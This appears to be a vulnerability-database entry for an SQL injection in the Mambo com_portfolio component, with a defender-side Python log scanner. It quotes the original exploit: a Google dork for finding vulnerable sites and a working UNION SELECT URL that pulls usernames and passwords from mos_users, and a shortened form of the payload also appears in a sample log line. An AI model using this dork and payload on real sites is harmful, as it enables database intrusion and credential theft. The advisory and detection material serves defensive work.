Vendor: Mambo
By: it's my
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Mambo
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:mambo_project:mambo:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

Mambo component Portfolio Manager 1.0 (com_portfolio)

The vulnerability is caused by improper sanitization of user-supplied input to the 'memberId' parameter of the 'index.php' script before it is passed to the 'mos_users' SQL query. An attacker can exploit this to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation allows an attacker to gain access to the database and disclose sensitive information.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
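
A defender-side check for the request pattern described above, added here as an example (it is not part of the original advisory or of the Mambo project): it scans access-log lines for com_portfolio requests whose memberId or categoryId is not a plain integer. The description names memberId while the published request carries the payload in categoryId, so both are checked; the numeric-only rule, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: both identifiers are plain non-negative integers in normal use.
ID_PARAMS = ("memberId", "categoryId")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
NUMERIC_RE = re.compile(r"\d{1,10}")


def suspicious_params(request_target):
    """Return {param: decoded value} for com_portfolio ids that are not numeric."""
    query = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    if "com_portfolio" not in query.get("option", []):
        return {}
    bad = {}
    for name in ID_PARAMS:
        for value in query.get(name, []):
            if not NUMERIC_RE.fullmatch(value):
                bad[name] = value
    return bad


def scan(log_lines):
    """Return [(line_number, findings)] for access-log lines with a finding."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            findings = suspicious_params(match.group(1))
            if findings:
                hits.append((number, findings))
    return hits


# Constructed sample lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Feb/2008:10:01:02 +0000] "GET /index.php?option=com_portfolio&memberId=9&categoryId=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [18/Feb/2008:10:02:41 +0000] "GET /index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2+from+mos_users/* HTTP/1.1" 200 6230 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [18/Feb/2008:10:03:15 +0000] "GET /index.php?option=com_content&id=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, findings)
```

The same numeric allowlist is what server-side input validation for these two parameters would enforce before the value reaches a query; access logs only cover the query string, so POST bodies need a separate source.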

Exploit-DB raw data:

#########################################################
##
##  Mambo component Portfolio Manager 1.0 (com_portfolio)
##
##
##  Author: it's my
##
##  Home page: http://www.antichat.ru
##
#########################################################
##
## Dork: inurl:"index.php?option=com_portfolio"
##
#########################################################
   
   Exploit:

http://site.com/index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+mos_users/*

#########################################################
## it's my sick world =/   ####    www.antichat.ru
#########################################################



    <name>portfolio</name>
    <creationDate>2005.09.15</creationDate>
    <author>Garry Malhi</author>
    <copyright>This component  is released under the GNU/GPL License</copyright>
    <authorEmail></authorEmail>
    <authorUrl></authorUrl>

    <version>1.0</version>
    <description>Portfolio Manager Component</description>

# milw0rm.com [2008-02-18]